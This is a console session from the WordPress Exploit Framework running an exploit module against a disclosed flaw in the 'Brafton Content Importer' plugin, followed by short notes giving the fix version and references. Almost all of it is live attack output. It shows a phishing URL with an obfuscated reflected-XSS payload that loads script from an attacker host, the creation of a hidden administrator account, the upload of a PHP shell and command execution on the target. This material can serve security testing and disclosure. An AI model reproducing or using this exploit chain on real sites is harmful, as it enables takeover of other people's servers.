wpxf > use exploit/brafton_content_importer_reflected_xss_shell_upload
[+] Loaded module:
#<Wpxf::Exploit::BraftonContentImporterReflectedXssShellUpload:0x00000002f3a050>
wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set host 192.168.0.27
[+] Set host => 192.168.0.27
wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set xss_host 192.168.0.20
[+] Set xss_host => 192.168.0.20
wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set http_server_bind_port 8080
[+] Set http_server_bind_port => 8080
wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000002edce78>
wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set cmd whoami
[+] Set cmd => whoami
wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > run
[-] Provide the URL below to the victim to begin the payload upload
http://192.168.0.27/wp-admin/admin.php?page=BraftonArticleLoader&tab=eval(String.fromCharCode(101,118,97,108,40,100,101,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,47,118,97,114,37,50,48,97,37,50,48,37,51,68,37,50,48,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,37,50,56,37,50,50,115,99,114,105,112,116,37,50,50,37,50,57,37,51,66,97,46,115,101,116,65,116,116,114,105,98,117,116,101,37,50,56,37,50,50,115,114,99,37,50,50,37,50,67,37,50,48,37,50,50,104,116,116,112,37,51,65,37,50,70,37,50,70,49,57,50,46,49,54,56,46,48,46,50,48,37,51,65,56,48,56,48,37,50,70,97,79,116,72,89,84,120,66,37,50,50,37,50,57,37,51,66,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,37,50,56,97,37,50,57,37,51,66,47,46,115,111,117,114,99,101,41,41))
[-] Started HTTP server on 0.0.0.0:8080
[-] Incoming request received, serving JavaScript...
[+] Created a new administrator user, DHnhab:erTPSVpUlA
[-] HTTP server stopped
[-] Authenticating with WordPress using DHnhab:erTPSVpUlA...
[-] Uploading payload...
[-] Executing the payload at
http://192.168.0.27/wp-content/plugins/FSAfGcekVl/UUkabnbIWV.php...
[+] Result: www-data
[+] Execution finished successfully
This module exploits the "Brafton Content Importer" WordPress plugin; the plugin can be downloaded from the following URL: https://github.com/BraftonSupport/BraftonWordpressPlugin/archive/v3.4.5.zip
Fixed in : 3.4.8 Note: the link for the plugin is the latest release [3.4.5] on GitHub but the vulnerability was fixed in 3.4.8
References:
WPVDBID : 8614
Disclosure :http://www.openwall.com/lists/oss-security/2016/05/20/5
example output: